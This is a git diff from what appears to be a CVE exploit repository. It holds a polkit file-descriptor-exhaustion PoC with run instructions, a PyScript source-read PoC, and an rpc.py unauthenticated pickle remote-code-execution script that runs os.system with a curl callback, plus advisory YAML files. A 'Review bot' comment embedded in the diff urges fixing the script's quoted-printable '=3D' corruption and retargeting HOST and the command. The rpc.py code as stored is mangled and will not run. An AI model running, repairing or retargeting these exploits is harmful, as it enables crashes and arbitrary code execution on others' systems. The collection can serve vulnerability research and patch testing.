- ctx = BN_CTX_new();
- BIGNUM *res, *a, *p;
- res = BN_CTX_get(ctx);
- a = BN_CTX_get(ctx);
- p = BN_CTX_get(ctx);
-
- BN_dec2bn(&p, "697");
- BN_dec2bn(&a, "696");
-
- printf("p = %s\n", BN_bn2dec(p));
- printf("a = %s\n", BN_bn2dec(a));
-
- BIGNUM* check = BN_mod_sqrt(res, a, p, ctx);
- printf("%s\n", BN_bn2dec(res));
-
- return 0;
+#include
+
+
+int main() {
+ BN_CTX *ctx;
+ ctx = BN_CTX_new();
+ BIGNUM *res, *a, *p;
+ res = BN_CTX_get(ctx);
+ a = BN_CTX_get(ctx);
+ p = BN_CTX_get(ctx);
+
+ BN_dec2bn(&p, "697");
+ BN_dec2bn(&a, "696");
+
+ printf("p = %s\n", BN_bn2dec(p));
+ printf("a = %s\n", BN_bn2dec(a));
+
+ BIGNUM* check = BN_mod_sqrt(res, a, p, ctx);
+ printf("%s\n", BN_bn2dec(res));
+
+ return 0;
 }
\ No newline at end of file
diff --git a/cve/openssl/2022/yaml/CVE-2022-3786.yaml b/cve/openssl/2022/yaml/CVE-2022-3786.yaml
index c532b8a2628b67b938cc5453165e60bb4e5ca9ef..f34c7ba9bb24a6596920be35acb0a07b19dc541b 100644
--- a/cve/openssl/2022/yaml/CVE-2022-3786.yaml
+++ b/cve/openssl/2022/yaml/CVE-2022-3786.yaml
@@ -1,19 +1,19 @@
-id: CVE-2022-3786
-source: https://github.com/WhatTheFuzz/openssl-fuzz
-info:
- name: 在TLS客户端中,通过连接到恶意服务器来触发漏洞。如果服务器请求客户端身份验证而恶意客户端连接,触发OpenSSL缓冲区溢出漏洞。
- severity: High
- description: |
- 在X.509证书验证中,特别是在名称约束检查中,可能会触发缓冲区溢出。这种情况发生在证书链签名验证之后,并且要求CA已经签署了恶意证书,或者要求应用程序在无法构造到受信任的颁发者的路径的情况下继续进行证书验证。攻击者可以在证书中伪造一个恶意的电子邮件地址来溢出任意数量的字节,其中包含'。'字符(十进制46)。缓冲区溢出可能导致崩溃(导致拒绝服务)。
- scope-of-influence:
- 3.0.0 <= OpenSSL <= 3.0.6
- reference:
- https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=c42165b5706e42f67ef8ef4c351a9a4c5d21639a
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
- cvss-score: 7.5
- cve-id: CVE-2022-3786
- cwe-id: CWE-120
- cnvd-id: None
- kve-id: None
+id: CVE-2022-3786
+source: https://github.com/WhatTheFuzz/openssl-fuzz
+info:
+ name: 在TLS客户端中,通过连接到恶意服务器来触发漏洞。如果服务器请求客户端身份验证而恶意客户端连接,触发OpenSSL缓冲区溢出漏洞。
+ severity: High
+ description: |
+ 在X.509证书验证中,特别是在名称约束检查中,可能会触发缓冲区溢出。这种情况发生在证书链签名验证之后,并且要求CA已经签署了恶意证书,或者要求应用程序在无法构造到受信任的颁发者的路径的情况下继续进行证书验证。攻击者可以在证书中伪造一个恶意的电子邮件地址来溢出任意数量的字节,其中包含'。'字符(十进制46)。缓冲区溢出可能导致崩溃(导致拒绝服务)。
+ scope-of-influence:
+ 3.0.0 <= OpenSSL <= 3.0.6
+ reference:
+ https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=c42165b5706e42f67ef8ef4c351a9a4c5d21639a
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
+ cvss-score: 7.5
+ cve-id: CVE-2022-3786
+ cwe-id: CWE-120
+ cnvd-id: None
+ kve-id: None
 tags: 缓冲区溢出, CVE-2022
\ No newline at end of file
diff --git a/cve/polkit/2021/CVE-2021-4115/CMakeLists.txt b/cve/polkit/2021/CVE-2021-4115/CMakeLists.txt
index c76a99b7612797f58c8a3aec3d6a830a724679e8..5ecd18e997575271a54e0c30742cb183c2dd8960 100644
--- a/cve/polkit/2021/CVE-2021-4115/CMakeLists.txt
+++ b/cve/polkit/2021/CVE-2021-4115/CMakeLists.txt
@@ -1,30 +1,30 @@
-cmake_minimum_required(VERSION 3.10)
-
-enable_testing()
-
-# set the project name
-project(GHSL-2021-077-polkit VERSION 1.0.0 DESCRIPTION "Proof of concept exploit for GHSL-2021-077: file descriptor exhaustion in polkit")
-
-# specify the C++ standard
-set(CMAKE_CXX_STANDARD 17)
-set(CMAKE_CXX_STANDARD_REQUIRED True)
-
-option(USE_SANITIZERS "Enable ASAN and UBSAN" OFF)
-
-add_compile_options(-Wall -Wextra -pedantic -Werror)
-
-if (USE_SANITIZERS)
- set(SANITIZER_FLAGS "-fsanitize=address,undefined")
- set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} ${SANITIZER_FLAGS}")
- set(CMAKE_C_FLAGS "${CMAKE_C_FLAGS} ${SANITIZER_FLAGS}")
- set(CMAKE_EXE_LINKER_FLAGS "${CMAKE_EXE_LINKER_FLAGS} ${SANITIZER_FLAGS}")
- set(CMAKE_MODULE_LINKER_FLAGS "${CMAKE_MODULE_LINKER_FLAGS} ${SANITIZER_FLAGS}")
-endif()
-
-add_subdirectory(DBusParse)
-
-add_executable(locksessions locksessions.cpp)
-target_link_libraries(locksessions PUBLIC DBusParse DBusParseUtils crypt)
-target_include_directories(
- locksessions PRIVATE
- $)
+cmake_minimum_required(VERSION 3.10)
+
+enable_testing()
+
+# set the project name
+project(GHSL-2021-077-polkit VERSION 1.0.0 DESCRIPTION "Proof of concept exploit for GHSL-2021-077: file descriptor exhaustion in polkit")
+
+# specify the C++ standard
+set(CMAKE_CXX_STANDARD 17)
+set(CMAKE_CXX_STANDARD_REQUIRED True)
+
+option(USE_SANITIZERS "Enable ASAN and UBSAN" OFF)
+
+add_compile_options(-Wall -Wextra -pedantic -Werror)
+
+if (USE_SANITIZERS)
+ set(SANITIZER_FLAGS "-fsanitize=address,undefined")
+ set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} ${SANITIZER_FLAGS}")
+ set(CMAKE_C_FLAGS "${CMAKE_C_FLAGS} ${SANITIZER_FLAGS}")
+ set(CMAKE_EXE_LINKER_FLAGS "${CMAKE_EXE_LINKER_FLAGS} ${SANITIZER_FLAGS}")
+ set(CMAKE_MODULE_LINKER_FLAGS "${CMAKE_MODULE_LINKER_FLAGS} ${SANITIZER_FLAGS}")
+endif()
+
+add_subdirectory(DBusParse)
+
+add_executable(locksessions locksessions.cpp)
+target_link_libraries(locksessions PUBLIC DBusParse DBusParseUtils crypt)
+target_include_directories(
+ locksessions PRIVATE
+ $)
diff --git a/cve/polkit/2021/CVE-2021-4115/README.md b/cve/polkit/2021/CVE-2021-4115/README.md
index 5f7d84a9cbdda7b93e72f851549fd6d47980b55d..f8168c4105474da3815b8baa692476a53121d25e 100644
--- a/cve/polkit/2021/CVE-2021-4115/README.md
+++ b/cve/polkit/2021/CVE-2021-4115/README.md
@@ -1,52 +1,52 @@ -Copyright 2021 Kevin Backhouse. - -# GHSL-2021-077 - -This repository contains a proof of concept exploit for GHSL-2021-077: -file descriptor exhaustion in -[polkit](https://gitlab.freedesktop.org/polkit/polkit). - -# Build - -Instructions for building the PoC: - -```bash -git submodule update --init # Download https://github.com/kevinbackhouse/DBusParse -mkdir build -cd build -cmake .. -make -``` - -# Running - -The PoC causes polkit to leak eventfd file descriptors. After several runs -of the PoC, polkit will leak so many file descriptors that it will crash -due to exceeding its quota of file descriptors. - -First, check how many file descriptors polkit has open: - -```bash -$ sudo ls -l /proc/`pidof polkitd`/fd | wc - 12 123 680 -``` - -Now run the PoC: - -```bash -./locksessions /var/run/dbus/system_bus_socket 0x4000 -``` - -(The PoC is named locksessions because it calls the -org.freedesktop.login1.Manager.LockSessions D-Bus method.) - -Now check again how many file descriptors polkit has open: - -``` -$ sudo ls -l /proc/`pidof polkitd`/fd | wc - 255 2796 16872 -``` - -Notice that a large number of eventfd file descriptors have been -leaked. After few more runs of the PoC, polkit will most likely -crash. +Copyright 2021 Kevin Backhouse. + +# GHSL-2021-077 + +This repository contains a proof of concept exploit for GHSL-2021-077: +file descriptor exhaustion in +[polkit](https://gitlab.freedesktop.org/polkit/polkit). + +# Build + +Instructions for building the PoC: + +```bash +git submodule update --init # Download https://github.com/kevinbackhouse/DBusParse +mkdir build +cd build +cmake .. +make +``` + +# Running + +The PoC causes polkit to leak eventfd file descriptors. After several runs +of the PoC, polkit will leak so many file descriptors that it will crash +due to exceeding its quota of file descriptors. 
+ +First, check how many file descriptors polkit has open: + +```bash +$ sudo ls -l /proc/`pidof polkitd`/fd | wc + 12 123 680 +``` + +Now run the PoC: + +```bash +./locksessions /var/run/dbus/system_bus_socket 0x4000 +``` + +(The PoC is named locksessions because it calls the +org.freedesktop.login1.Manager.LockSessions D-Bus method.) + +Now check again how many file descriptors polkit has open: + +``` +$ sudo ls -l /proc/`pidof polkitd`/fd | wc + 255 2796 16872 +``` + +Notice that a large number of eventfd file descriptors have been +leaked. After few more runs of the PoC, polkit will most likely +crash. diff --git a/cve/polkit/2021/CVE-2021-4115/locksessions.cpp b/cve/polkit/2021/CVE-2021-4115/locksessions.cpp index 2046cc8a087189039d2c676e93b494410b7a0e78..5c036a263085aefbc06d39acc17b8b4ad1bddffc 100644 --- a/cve/polkit/2021/CVE-2021-4115/locksessions.cpp +++ b/cve/polkit/2021/CVE-2021-4115/locksessions.cpp 
@@ -1,111 +1,111 @@ -// Copyright 2021 Kevin Backhouse. -// -// This file is part of GHSL-2021-077-polkit. -// -// GHSL-2021-077-polkit is free software: you can redistribute it and/or modify -// it under the terms of the GNU General Public License as published by -// the Free Software Foundation, either version 3 of the License, or -// (at your option) any later version. -// -// GHSL-2021-077-polkit is distributed in the hope that it will be useful, -// but WITHOUT ANY WARRANTY; without even the implied warranty of -// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -// GNU General Public License for more details. -// -// You should have received a copy of the GNU General Public License -// along with GHSL-2021-077-polkit. If not, see . - - -#include "dbus_utils.hpp" -#include "dbus_auth.hpp" -#include "utils.hpp" -#include -#include -#include - -class DBusSocket : public AutoCloseFD { -public: - DBusSocket(const uid_t uid, const char* filename) : - AutoCloseFD(socket(AF_UNIX, SOCK_STREAM, 0)) - { - if (get() < 0) { - throw ErrorWithErrno("Could not create socket"); - } - - sockaddr_un address; - memset(&address, 0, sizeof(address)); - address.sun_family = AF_UNIX; - strcpy(address.sun_path, filename); - - if (connect(get(), (sockaddr*)(&address), sizeof(address)) < 0) { - throw ErrorWithErrno("Could not connect socket"); - } - - dbus_sendauth(uid, get()); - - dbus_send_hello(get()); - std::unique_ptr hello_reply1 = receive_dbus_message(get()); - std::string name = hello_reply1->getBody().getElement(0)->toString().getValue(); - std::unique_ptr hello_reply2 = receive_dbus_message(get()); - } -}; - -static void send_logind_LockSessions(const int fd, const uint32_t serialNumber) { - dbus_method_call( - fd, - serialNumber, - DBusMessageBody::mk0(), - _s("/org/freedesktop/login1"), - _s("org.freedesktop.login1.Manager"), - _s("org.freedesktop.login1"), - _s("LockSessions") - ); -} - -// Keep trying `attempt_LockSessions_with_disconnect` with different -// 
delay values until the exploit succeeds (or we decide to give up). -static void exploit_LockSessions( - const uid_t uid, - const char* filename, - const long n -) { - DBusSocket fd(uid, filename); - - for (long i = 0; i < n; i++) { - send_logind_LockSessions(fd.get(), i+1); - } -} - -static void usage(const char* progname) { - fprintf( - stderr, - "usage: %s \n" - "example: %s /var/run/dbus/system_bus_socket 4096\n", - progname, - progname - ); -} - -int main(int argc, char* argv[]) { - const char* progname = argc > 0 ? argv[0] : "a.out"; - if (argc != 3) { - usage(progname); - return EXIT_FAILURE; - } - - char* endptr = 0; - const long n = strtol(argv[2], &endptr, 0); - if (endptr == argv[2] || *endptr != '\0') { - usage(progname); - return EXIT_FAILURE; - } - - const uid_t uid = getuid(); - const char* filename = argv[1]; - - for (size_t i = 0; i < 1; i++) { - exploit_LockSessions(uid, filename, n); - } - - return EXIT_SUCCESS; -} +// Copyright 2021 Kevin Backhouse. +// +// This file is part of GHSL-2021-077-polkit. +// +// GHSL-2021-077-polkit is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// GHSL-2021-077-polkit is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with GHSL-2021-077-polkit. If not, see . 
+ + +#include "dbus_utils.hpp" +#include "dbus_auth.hpp" +#include "utils.hpp" +#include +#include +#include + +class DBusSocket : public AutoCloseFD { +public: + DBusSocket(const uid_t uid, const char* filename) : + AutoCloseFD(socket(AF_UNIX, SOCK_STREAM, 0)) + { + if (get() < 0) { + throw ErrorWithErrno("Could not create socket"); + } + + sockaddr_un address; + memset(&address, 0, sizeof(address)); + address.sun_family = AF_UNIX; + strcpy(address.sun_path, filename); + + if (connect(get(), (sockaddr*)(&address), sizeof(address)) < 0) { + throw ErrorWithErrno("Could not connect socket"); + } + + dbus_sendauth(uid, get()); + + dbus_send_hello(get()); + std::unique_ptr hello_reply1 = receive_dbus_message(get()); + std::string name = hello_reply1->getBody().getElement(0)->toString().getValue(); + std::unique_ptr hello_reply2 = receive_dbus_message(get()); + } +}; + +static void send_logind_LockSessions(const int fd, const uint32_t serialNumber) { + dbus_method_call( + fd, + serialNumber, + DBusMessageBody::mk0(), + _s("/org/freedesktop/login1"), + _s("org.freedesktop.login1.Manager"), + _s("org.freedesktop.login1"), + _s("LockSessions") + ); +} + +// Keep trying `attempt_LockSessions_with_disconnect` with different +// delay values until the exploit succeeds (or we decide to give up). +static void exploit_LockSessions( + const uid_t uid, + const char* filename, + const long n +) { + DBusSocket fd(uid, filename); + + for (long i = 0; i < n; i++) { + send_logind_LockSessions(fd.get(), i+1); + } +} + +static void usage(const char* progname) { + fprintf( + stderr, + "usage: %s \n" + "example: %s /var/run/dbus/system_bus_socket 4096\n", + progname, + progname + ); +} + +int main(int argc, char* argv[]) { + const char* progname = argc > 0 ? 
argv[0] : "a.out"; + if (argc != 3) { + usage(progname); + return EXIT_FAILURE; + } + + char* endptr = 0; + const long n = strtol(argv[2], &endptr, 0); + if (endptr == argv[2] || *endptr != '\0') { + usage(progname); + return EXIT_FAILURE; + } + + const uid_t uid = getuid(); + const char* filename = argv[1]; + + for (size_t i = 0; i < 1; i++) { + exploit_LockSessions(uid, filename, n); + } + + return EXIT_SUCCESS; +} diff --git a/cve/polkit/2021/yaml/CVE-2021-4115.yaml b/cve/polkit/2021/yaml/CVE-2021-4115.yaml index 6b342c5462f38db15690c4d26260abc78770d2d9..335c9413171e3b4d7ad8d705561a7822036e0dd0 100644 --- a/cve/polkit/2021/yaml/CVE-2021-4115.yaml +++ b/cve/polkit/2021/yaml/CVE-2021-4115.yaml 
@@ -1,23 +1,23 @@ -id: CVE-2021-4115 -source: https://github.com/github/securitylab/tree/main/SecurityExploits/polkit/file_descriptor_exhaustion_CVE-2021-4115 -info: - name: Polkit(PolicyKit)是类Unix系统中一个应用程序级别的工具集,通过定义和审核权限规则,实现不同优先级进程间的通讯。pkexec是Polkit开源应用框架的一部分,可以使授权非特权用户根据定义的策略以特权用户的身份执行命令。 - severity: Medium - description: | - Polkit 存在资源管理错误漏洞,该漏洞源于进程文件描述符耗尽,攻击者利用该漏洞允许非特权用户导致polkit崩溃。 - scope-of-influence: - polkit = 0.117 - reference: - - https://access.redhat.com/security/cve/cve-2021-4115 - - https://gitlab.com/redhat/centos-stream/rpms/polkit/-/merge_requests/6/diffs?commit_id=bf900df04dc390d389e59aa10942b0f2b15c531e - - https://gitlab.freedesktop.org/polkit/polkit/-/issues/141 - - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VGKWCBS6IDZYYDYM2WIWJM5BL7QQTWPF/ - - https://www.oracle.com/security-alerts/cpujul2022.html - classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H - cvss-score: 5.5 - cve-id: CVE-2021-4115 - cwe-id: CWE-400 - cnvd-id: None - kve-id: None +id: CVE-2021-4115 +source: https://github.com/github/securitylab/tree/main/SecurityExploits/polkit/file_descriptor_exhaustion_CVE-2021-4115 +info: + name: Polkit(PolicyKit)是类Unix系统中一个应用程序级别的工具集,通过定义和审核权限规则,实现不同优先级进程间的通讯。pkexec是Polkit开源应用框架的一部分,可以使授权非特权用户根据定义的策略以特权用户的身份执行命令。 + severity: Medium + description: | + Polkit 存在资源管理错误漏洞,该漏洞源于进程文件描述符耗尽,攻击者利用该漏洞允许非特权用户导致polkit崩溃。 + scope-of-influence: + polkit = 0.117 + reference: + - https://access.redhat.com/security/cve/cve-2021-4115 + - https://gitlab.com/redhat/centos-stream/rpms/polkit/-/merge_requests/6/diffs?commit_id=bf900df04dc390d389e59aa10942b0f2b15c531e + - https://gitlab.freedesktop.org/polkit/polkit/-/issues/141 + - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VGKWCBS6IDZYYDYM2WIWJM5BL7QQTWPF/ + - https://www.oracle.com/security-alerts/cpujul2022.html + classification: + cvss-metrics: 
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H + cvss-score: 5.5 + cve-id: CVE-2021-4115 + cwe-id: CWE-400 + cnvd-id: None + kve-id: None tags: cve2021, 未加控制的资源消耗(资源穷尽) \ No newline at end of file diff --git a/cve/python/2022/CVE-2022-30286/CVE-2022-30286.txt b/cve/python/2022/CVE-2022-30286/CVE-2022-30286.txt index c9a9c288b0574944ff46834082e08b7beaf9ebc2..5df5b8b9b8d0928a30c649822cc1865e01bc8c0d 100644 --- a/cve/python/2022/CVE-2022-30286/CVE-2022-30286.txt +++ b/cve/python/2022/CVE-2022-30286/CVE-2022-30286.txt @@ -1,18 +1,18 @@ -# Exploit Title: PyScript Remote Emscripten VMemory Python libraries -Source Codes Read -# Date: 5-9-2022 -# Exploit Author: Momen Eldawakhly (Cyber Guy) -# Vendor Homepage: https://pyscript.net/ -# Software Link: https://github.com/pyscript/pyscript -# Version: 2022-05-04-Alpha -# Tested on: Ubuntu Apache Server -# CVE : CVE-2022-30286 - - -x = "CyberGuy" -if x == "CyberGuy": - with open('/lib/python3.10/asyncio/tasks.py') as output: - contents = output.read() - print(contents) -print('') +# Exploit Title: PyScript Remote Emscripten VMemory Python libraries +Source Codes Read +# Date: 5-9-2022 +# Exploit Author: Momen Eldawakhly (Cyber Guy) +# Vendor Homepage: https://pyscript.net/ +# Software Link: https://github.com/pyscript/pyscript +# Version: 2022-05-04-Alpha +# Tested on: Ubuntu Apache Server +# CVE : CVE-2022-30286 + + +x = "CyberGuy" +if x == "CyberGuy": + with open('/lib/python3.10/asyncio/tasks.py') as output: + contents = output.read() + print(contents) +print('') \ No newline at end of file diff --git a/cve/python/2022/CVE-2022-30286/README.md b/cve/python/2022/CVE-2022-30286/README.md index 68e763a90dd3b0569329ac582ca3869118471939..bae1fb18cb20dcd18a1d7380a40e2e560463b69b 100644 --- a/cve/python/2022/CVE-2022-30286/README.md +++ b/cve/python/2022/CVE-2022-30286/README.md 
@@ -1,25 +1,25 @@ -# PyScript Remote Emscripten VMemory Python libraries -Date: 5-9-2022 -Exploit Author: Momen Eldawakhly (Cyber Guy) -Vendor Homepage: https://pyscript.net/ -Software Link: https://github.com/pyscript/pyscript -Version: 2022-05-04-Alpha -Tested on: Ubuntu Apache Server -CVE : CVE-2022-30286 -# Poc -``` - -x = "CyberGuy" -if x == "CyberGuy": - with open('/lib/python3.10/asyncio/tasks.py') as output: - contents = output.read() - print(contents) -print('') - -``` -# reference -http://packetstormsecurity.com/files/167069/PyScript-2022-05-04-Alpha-Source-Code-Disclosure.html -https://cyber-guy.gitbook.io/cyber-guy/blogs/the-art-of-vulnerability-chaining-pyscript -https://cyber-guy.gitbook.io/cyber-guy/pocs/pyscript-file-read -https://github.com/pyscript/pyscript/commits/main +# PyScript Remote Emscripten VMemory Python libraries +Date: 5-9-2022 +Exploit Author: Momen Eldawakhly (Cyber Guy) +Vendor Homepage: https://pyscript.net/ +Software Link: https://github.com/pyscript/pyscript +Version: 2022-05-04-Alpha +Tested on: Ubuntu Apache Server +CVE : CVE-2022-30286 +# Poc +``` + +x = "CyberGuy" +if x == "CyberGuy": + with open('/lib/python3.10/asyncio/tasks.py') as output: + contents = output.read() + print(contents) +print('') + +``` +# reference +http://packetstormsecurity.com/files/167069/PyScript-2022-05-04-Alpha-Source-Code-Disclosure.html +https://cyber-guy.gitbook.io/cyber-guy/blogs/the-art-of-vulnerability-chaining-pyscript +https://cyber-guy.gitbook.io/cyber-guy/pocs/pyscript-file-read +https://github.com/pyscript/pyscript/commits/main https://www.exploit-db.com/exploits/50918 \ No newline at end of file diff --git a/cve/python/2022/CVE-2022-35411/CVE-2022-35411.py b/cve/python/2022/CVE-2022-35411/CVE-2022-35411.py index 467cc1752e766874ca03b9077a2d49e546351da5..1ea07853d0c99456b4913c35dfedad091488135a 100644 --- a/cve/python/2022/CVE-2022-35411/CVE-2022-35411.py +++ b/cve/python/2022/CVE-2022-35411/CVE-2022-35411.py 
@@ -1,52 +1,52 @@ -# Exploit Title: rpc.py 0.6.0 - Remote Code Execution (RCE) -# Google Dork: N/A -# Date: 2022-07-12 -# Exploit Author: Elias Hohl -# Vendor Homepage: https://github.com/abersheeran -# Software Link: https://github.com/abersheeran/rpc.py -# Version: v0.4.2 - v0.6.0 -# Tested on: Debian 11, Ubuntu 20.04 -# CVE : CVE-2022-35411 - -import requests -import pickle - -# Unauthenticated RCE 0-day for https://github.com/abersheeran/rpc.py - -HOST =3D "127.0.0.1:65432" - -URL =3D f"http://{HOST}/sayhi" - -HEADERS =3D { - "serializer": "pickle" -} - - -def generate_payload(cmd): - - class PickleRce(object): - def __reduce__(self): - import os - return os.system, (cmd,) - - payload =3D pickle.dumps(PickleRce()) - - print(payload) - - return payload - - -def exec_command(cmd): - - payload =3D generate_payload(cmd) - - requests.post(url=3DURL, data=3Dpayload, headers=3DHEADERS) - - -def main(): - exec_command('curl http://127.0.0.1:4321') - # exec_command('uname -a') - - -if __name__ =3D=3D "__main__": +# Exploit Title: rpc.py 0.6.0 - Remote Code Execution (RCE) +# Google Dork: N/A +# Date: 2022-07-12 +# Exploit Author: Elias Hohl +# Vendor Homepage: https://github.com/abersheeran +# Software Link: https://github.com/abersheeran/rpc.py +# Version: v0.4.2 - v0.6.0 +# Tested on: Debian 11, Ubuntu 20.04 +# CVE : CVE-2022-35411 + +import requests +import pickle + +# Unauthenticated RCE 0-day for https://github.com/abersheeran/rpc.py + +HOST =3D "127.0.0.1:65432" + +URL =3D f"http://{HOST}/sayhi" + +HEADERS =3D { + "serializer": "pickle" +} + + +def generate_payload(cmd): + + class PickleRce(object): + def __reduce__(self): + import os + return os.system, (cmd,) + + payload =3D pickle.dumps(PickleRce()) + + print(payload) + + return payload + + +def exec_command(cmd): + + payload =3D generate_payload(cmd) + + requests.post(url=3DURL, data=3Dpayload, headers=3DHEADERS) + + +def main(): + exec_command('curl http://127.0.0.1:4321') + # exec_command('uname -a') + + +if 
__name__ =3D=3D "__main__": main() \ No newline at end of file diff --git a/cve/python/2022/CVE-2022-35411/README.md b/cve/python/2022/CVE-2022-35411/README.md index fbc233473da7637ea1751976cf17faa48faeadbb..25db92b43000b1aa91f3ac966c1a189c88ae4df1 100644 --- a/cve/python/2022/CVE-2022-35411/README.md +++ b/cve/python/2022/CVE-2022-35411/README.md @@ -1,18 +1,18 @@ -# rpc.py 0.6.0 - Remote Code Execution (RCE) -Google Dork: N/A -Date: 2022-07-12 -Exploit Author: Elias Hohl -Vendor Homepage: https://github.com/abersheeran -Software Link: https://github.com/abersheeran/rpc.py -Version: v0.4.2 - v0.6.0 -Tested on: Debian 11, Ubuntu 20.04 -CVE : CVE-2022-35411 -# Usage -``` -python CVE-2022-35411.py -``` -# reference -http://packetstormsecurity.com/files/167872/rpc.py-0.6.0-Remote-Code-Execution.html -https://github.com/abersheeran/rpc.py/commit/491e7a841ed9a754796d6ab047a9fb16e23bf8bd Patch Third Party Advisory -https://github.com/ehtec/rpcpy-exploit Third Party Advisory +# rpc.py 0.6.0 - Remote Code Execution (RCE) +Google Dork: N/A +Date: 2022-07-12 +Exploit Author: Elias Hohl +Vendor Homepage: https://github.com/abersheeran +Software Link: https://github.com/abersheeran/rpc.py +Version: v0.4.2 - v0.6.0 +Tested on: Debian 11, Ubuntu 20.04 +CVE : CVE-2022-35411 +# Usage +``` +python CVE-2022-35411.py +``` +# reference +http://packetstormsecurity.com/files/167872/rpc.py-0.6.0-Remote-Code-Execution.html +https://github.com/abersheeran/rpc.py/commit/491e7a841ed9a754796d6ab047a9fb16e23bf8bd Patch Third Party Advisory +https://github.com/ehtec/rpcpy-exploit Third Party Advisory https://medium.com/@elias.hohl/remote-code-execution-0-day-in-rpc-py-709c76690c30 \ No newline at end of file diff --git a/cve/python/2022/yaml/CVE-2022-30286.yaml b/cve/python/2022/yaml/CVE-2022-30286.yaml index 613b500754c4f138a4a7b16d780e36ff81d5d896..3d2d3f07b01d203dbafd2e8cab5faabcab12edc4 100644 --- a/cve/python/2022/yaml/CVE-2022-30286.yaml +++ b/cve/python/2022/yaml/CVE-2022-30286.yaml 
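Review bot: The new side of this hunk is not valid Python as stored: every `=` appears as `=3D` (`HOST =3D "127.0.0.1:65432"`, `requests.post(url=3DURL, data=3Dpayload, headers=3DHEADERS)`, `if __name__ =3D=3D "__main__":`), which is the quoted-printable encoding of `=`, so the script fails with a SyntaxError before any request is sent. The hunk appears to re-add the same 52 lines unchanged (presumably a line-ending normalization), so the mangling is inherited rather than introduced, but since the whole file is being rewritten this is the place to decode it by replacing each `=3D` with `=`, giving e.g. `HOST = "127.0.0.1:65432"` and `payload = pickle.dumps(PickleRce())`. Independently, `HOST` and the `curl http://127.0.0.1:4321` callback are hard-coded to localhost, so a one-line comment such as `# Edit HOST to the rpc.py target and replace the curl callback with the command to run` would save the next reader a failed run.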
@@ -1,24 +1,24 @@ -id: CVE-2022-30286 -source: https://www.exploit-db.com/exploits/50918 -info: - name: PyScript Remote Emscripten VMemory Python libraries - severity: critical - description: - pyscriptjs (aka PyScript Demonstrator) in PyScript through 2022-05-04 allows a remote user to read Python source code. - scope-of-influence: - PyScript < v2.3 - reference: - - http://packetstormsecurity.com/files/167069/PyScript-2022-05-04-Alpha-Source-Code-Disclosure.html - - https://cyber-guy.gitbook.io/cyber-guy/blogs/the-art-of-vulnerability-chaining-pyscript - - https://cyber-guy.gitbook.io/cyber-guy/pocs/pyscript-file-read - - https://github.com/pyscript/pyscript/commits/main - - https://www.exploit-db.com/exploits/50918 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2022-30286 - cwe-id: None - cnvd-id: None - kve-id: None - tags: +id: CVE-2022-30286 +source: https://www.exploit-db.com/exploits/50918 +info: + name: PyScript Remote Emscripten VMemory Python libraries + severity: critical + description: + pyscriptjs (aka PyScript Demonstrator) in PyScript through 2022-05-04 allows a remote user to read Python source code. + scope-of-influence: + PyScript < v2.3 + reference: + - http://packetstormsecurity.com/files/167069/PyScript-2022-05-04-Alpha-Source-Code-Disclosure.html + - https://cyber-guy.gitbook.io/cyber-guy/blogs/the-art-of-vulnerability-chaining-pyscript + - https://cyber-guy.gitbook.io/cyber-guy/pocs/pyscript-file-read + - https://github.com/pyscript/pyscript/commits/main + - https://www.exploit-db.com/exploits/50918 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-30286 + cwe-id: None + cnvd-id: None + kve-id: None + tags: - Source Codes Read \ No newline at end of file 
diff --git a/cve/python/2022/yaml/CVE-2022-35411.yaml b/cve/python/2022/yaml/CVE-2022-35411.yaml
index 3e14c1845a5b10663053b181af3d4ab6fcab2b4e..c8e145a55e90910684d8f66f86a0e69886dffa47 100644
--- a/cve/python/2022/yaml/CVE-2022-35411.yaml
+++ b/cve/python/2022/yaml/CVE-2022-35411.yaml
@@ -1,22 +1,22 @@ -id: CVE-2022-35411 -source: https://www.exploit-db.com/exploits/50983 -info: - name: python中的rpc库,rpc是远程过程调用(Remote Procedure Call)的缩写形式。rpc采用客户机/服务器模式。请求程序就是一个客户机,而服务提供程序就是一个服务器。首先,调用进程发送一个有进程参数的调用信息到服务进程,然后等待应答信息。在服务器端,进程保持睡眠状态直到调用信息的到达为止。获得进程结果,然后调用执行继续进行。 - severity: critical - description: - rpc.py through 0.6.0 allows Remote Code Execution because an unpickle occurs when the "serializer-pickle" HTTP header is sent. In other words, although JSON (not Pickle) is the default data format, an unauthenticated client can cause the data to be processed with unpickle. - scope-of-influence: - rpc.py v0.4.2 - v0.6.0 - reference: - - http://packetstormsecurity.com/files/167872/rpc.py-0.6.0-Remote-Code-Execution.html - - https://github.com/abersheeran/rpc.py/commit/491e7a841ed9a754796d6ab047a9fb16e23bf8bd - - https://github.com/ehtec/rpcpy-exploit - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-35411 - cwe-id: None - cnvd-id: None - kve-id: None - tags: - - 远程代码执行 +id: CVE-2022-35411 +source: https://www.exploit-db.com/exploits/50983 +info: + name: python中的rpc库,rpc是远程过程调用(Remote Procedure 